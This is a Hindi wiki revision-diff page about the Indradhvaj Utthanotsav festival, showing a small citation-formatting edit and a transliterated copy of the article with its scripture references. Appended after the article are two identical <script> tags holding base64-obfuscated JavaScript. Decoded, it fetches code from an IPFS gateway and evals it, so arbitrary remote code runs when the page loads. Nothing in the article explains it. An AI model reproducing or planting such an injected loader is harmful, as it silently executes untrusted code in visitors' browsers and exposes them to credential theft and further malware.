Difference between revisions of "इन्द्रध्वज उत्थानोत्सव"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "ref>(" to "ref>")
m (Text replace - ")</ref" to "</ref")
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*इन्द्रध्वज उत्थानोत्सव का वराह की बृहत्संहिता<ref>वराह की बृहत्संहिता अध्याय43)</ref>,  कालिकापुराण<ref>कालिकापुराण 90)</ref>, राजमार्तण्ड<ref>राजमार्तण्ड 1260-1292)</ref>, हेमाद्रि व्रतखण्ड<ref>हेमाद्रि व्रतखण्ड 2, 401-419)</ref>, तिथितत्त्व<ref>तिथितत्त्व 115-117)</ref>, वर्षक्रियाकौमुदी<ref>वर्षक्रियाकौमुदी322-323)</ref>, कालविवेक<ref>कालविवेक 294-299)</ref>, कृत्यरत्नाकर<ref>कृत्यरत्नाकर 292-293)</ref> में वर्णन किया गया है।
+
*इन्द्रध्वज उत्थानोत्सव का वराह की बृहत्संहिता<ref>वराह की बृहत्संहिता अध्याय43</ref>,  कालिकापुराण<ref>कालिकापुराण 90</ref>, राजमार्तण्ड<ref>राजमार्तण्ड 1260-1292</ref>, हेमाद्रि व्रतखण्ड<ref>हेमाद्रि व्रतखण्ड 2, 401-419</ref>, तिथितत्त्व<ref>तिथितत्त्व 115-117</ref>, वर्षक्रियाकौमुदी<ref>वर्षक्रियाकौमुदी322-323</ref>, कालविवेक<ref>कालविवेक 294-299</ref>, कृत्यरत्नाकर<ref>कृत्यरत्नाकर 292-293</ref> में वर्णन किया गया है।
*इन्द्रध्वज उत्थानोत्सव राजा के लिए व्यवस्थित है।<ref> [[बुद्धचरित]], (रघुवंश 4|3),  (मृच्छकटिका 10|7); (कालिकापुराण 90) कृत्यकल्पतरु (राजधर्म, 184-190); (राजनीतिप्रकाश 421-423)</ref>
+
*इन्द्रध्वज उत्थानोत्सव राजा के लिए व्यवस्थित है।<ref> [[बुद्धचरित]], (रघुवंश 4|3),  (मृच्छकटिका 10|7); (कालिकापुराण 90) कृत्यकल्पतरु (राजधर्म, 184-190); (राजनीतिप्रकाश 421-423</ref>
 
*इसने [[विष्णु पुराण|विष्णुधर्मोत्तर पुराण]] से बहुत से आशीर्वाद एवं प्रार्थना के मन्त्र उर्द्धत किए हैं।  
 
*इसने [[विष्णु पुराण|विष्णुधर्मोत्तर पुराण]] से बहुत से आशीर्वाद एवं प्रार्थना के मन्त्र उर्द्धत किए हैं।  
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}

Latest revision as of 12:41, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • indradhvaj utthanotsav ka varah ki brihatsanhita[1], kalikapuran[2], rajamartand[3], hemadri vratakhand[4], tithitattv[5], varshakriyakaumudi[6], kalavivek[7], krityaratnakar[8] mean varnan kiya gaya hai.
  • indradhvaj utthanotsav raja ke lie vyavasthit hai.[9]
  • isane vishnudharmottar puran se bahut se ashirvad evan prarthana ke mantr urddhat kie haian.

tika tippani aur sandarbh

  1. varah ki brihatsanhita adhyay43
  2. kalikapuran 90
  3. rajamartand 1260-1292
  4. hemadri vratakhand 2, 401-419
  5. tithitattv 115-117
  6. varshakriyakaumudi322-323
  7. kalavivek 294-299
  8. krityaratnakar 292-293
  9. buddhacharit, (raghuvansh 4|3), (mrichchhakatika 10|7); (kalikapuran 90) krityakalpataru (rajadharm, 184-190); (rajanitiprakash 421-423

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>